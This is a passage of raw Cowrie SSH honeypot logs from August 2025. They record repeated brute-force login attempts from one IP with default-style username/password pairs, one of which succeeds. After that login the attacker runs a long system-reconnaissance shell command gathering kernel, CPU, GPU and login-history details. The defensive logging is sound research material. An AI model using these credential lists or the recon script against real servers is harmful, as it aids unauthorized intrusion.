cdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T21:20:40.039563Z","src_ip":"212.227.235.229","session":"f1d201048369"}
{"eventid":"cowrie.login.success","username":"root","password":"p@ssw0rd","message":"login attempt [root/p@ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:20:46.173256Z","src_ip":"212.227.235.229","session":"f1d201048369"}
{"eventid":"cowrie.login.failed","username":"admin","password":"aerohive","message":"login attempt [admin/aerohive] failed","sensor":"my-vps","timestamp":"2025-08-26T21:20:48.254581Z","src_ip":"212.227.235.229","session":"c6527eb73fa9"}
{"eventid":"cowrie.session.closed","duration":"14.4","message":"Connection lost after 14.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:20:49.742164Z","src_ip":"212.227.235.229","session":"c6527eb73fa9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:20:50.279584Z","src_ip":"212.227.235.229","session":"f1d201048369"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T21:20:50.280563Z","src_ip":"212.227.235.229","session":"f1d201048369"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T21:20:50.281520Z","src_ip":"212.227.235.229","session":"f1d201048369"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T21:20:50.283548Z","src_ip":"212.227.235.229","session":"f1d201048369"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T21:20:50.285252Z","src_ip":"212.227.235.229","session":"f1d201048369"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T21:20:50.286360Z","src_ip":"212.227.235.229","session":"f1d201048369"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T21:20:50.287632Z","src_ip":"212.227.235.229","session":"f1d201048369"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T21:20:50.289081Z","src_ip":"212.227.235.229","session":"f1d201048369"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T21:20:50.290054Z","src_ip":"212.227.235.229","session":"f1d201048369"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T21:20:50.290922Z","src_ip":"212.227.235.229","session":"f1d201048369"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T21:20:50.291767Z","src_ip":"212.227.235.229","session":"f1d201048369"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T21:20:50.292679Z","src_ip":"212.227.235.229","session":"f1d201048369"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T21:20:50.293807Z","src_ip":"212.227.235.229","session":"f1d201048369"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T21:20:50.712044Z","src_ip":"212.227.235.229","session":"f1d201048369"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:20:50.712938Z","src_ip":"212.227.235.229","session":"f1d201048369"}
{"eventid":"cowrie.session.closed","duration":"12.9","message":"Connection lost after 12.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:20:50.714094Z","src_ip":"212.227.235.229","session":"f1d201048369"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53482,"dst_ip":"1.2.3.4","dst_port":22,"session":"a070b4246c7d","protocol":"ssh","message":"New connection: 212.227.235.229:53482 (1.2.3.4:22) [session: a070b4246c7d]","sensor":"my-vps","timestamp":"2025-08-26T21:20:55.209588Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:20:55.361784Z","src_ip":"212.227.235.229","session":"a070b4246c7d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53484,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1d10a515eb5","protocol":"ssh","message":"New connection: 212.227.235.229:53484 (1.2.3.4:22) [session: f1d10a515eb5]","sensor":"my-vps","timestamp":"2025-08-26T21:20:56.288411Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:20:56.307045Z","src_ip":"212.227.235.229","session":"f1d10a515eb5"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:20:56.636890Z","src_ip":"212.227.235.229","session":"f1d10a515eb5"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:20:56.753807Z","src_ip":"212.227.235.229","session":"a070b4246c7d"}
{"eventid":"cowrie.login.failed","username":"sysadmin","password":"sysadmin","message":"login attempt [sysadmin/sysadmin] failed","sensor":"my-vps","timestamp":"2025-08-26T21:20:57.901935Z","src_ip":"212.227.235.229","session":"a070b4246c7d"}
{"eventid":"cowrie.login.failed","username":"madrid","password":"madrid","message":"login attempt [madrid/madrid] failed","sensor":"my-vps","timestamp":"2025-08-26T21:20:58.255309Z","src_ip":"212.227.235.229","session":"f1d10a515eb5"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:20:59.404004Z","src_ip":"212.227.235.229","session":"a070b4246c7d"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:21:00.083227Z","src_ip":"212.227.235.229","session":"f1d10a515eb5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45848,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2a4b0f5dd61","protocol":"ssh","message":"New connection: 212.227.235.229:45848 (1.2.3.4:22) [session: b2a4b0f5dd61]","sensor":"my-vps","timestamp":"2025-08-26T21:21:01.021646Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:21:01.161226Z","src_ip":"212.227.235.229","session":"b2a4b0f5dd61"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:21:01.304121Z","src_ip":"212.227.235.229","session":"b2a4b0f5dd61"}
{"eventid":"cowrie.login.failed","username":"reception","password":"reception","message":"login attempt [reception/reception] failed","sensor":"my-vps","timestamp":"2025-08-26T21:21:02.469362Z","src_ip":"212.227.235.229","session":"b2a4b0f5dd61"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:21:03.861570Z","src_ip":"212.227.235.229","session":"b2a4b0f5dd61"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45656,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d3a49e693ab","protocol":"ssh","message":"New connection: 212.227.235.229:45656 (1.2.3.4:22) [session: 8d3a49e693ab]","sensor":"my-vps","timestamp":"2025-08-26T21:21:28.633945Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:21:28.861640Z","src_ip":"212.227.235.229","session":"8d3a49e693ab"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:21:28.930106Z","src_ip":"212.227.235.229","session":"8d3a49e693ab"}
{"eventid":"cowrie.login.failed","username":"ssh","password":"ssh","message":"login attempt [ssh/ssh] failed","sensor":"my-vps","timestamp":"2025-08-26T21:21:30.914731Z","src_ip":"212.227.235.229","session":"8d3a49e693ab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56126,"dst_ip":"1.2.3.4","dst_port":22,"session":"46c025f61e55","protocol":"ssh","message":"New connection: 212.227.235.229:56126 (1.2.3.4:22) [session: 46c025f61e55]","sensor":"my-vps","timestamp":"2025-08-26T21:21:32.718614Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:21:32.730741Z","src_ip":"212.227.235.229","session":"46c025f61e55"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:21:32.883236Z","src_ip":"212.227.235.229","session":"8d3a49e693ab"}
